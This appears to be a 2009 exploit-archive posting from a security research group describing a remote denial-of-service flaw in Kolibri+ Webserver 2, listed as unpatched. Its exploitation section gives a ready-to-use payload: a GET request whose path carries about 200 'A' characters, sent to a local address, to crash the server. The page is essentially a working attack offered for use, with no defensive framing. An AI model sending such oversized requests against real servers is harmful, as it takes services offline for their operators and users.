Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability
# Published : 2009-09-10
# Author : Usman Saeed
# Previous Title : jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC
# Next Title : WarFTPd 1.82.00-RC12 (LIST command) Format String DoS Exploit

#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , Denial Of service / Crash
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Date    :   06/09/09
#   Homepage :  http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :



[+] [Denial Of Service / CRASH]

("A" x 200; #Late crash)

Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

# www.Syue.com [2009-09-10]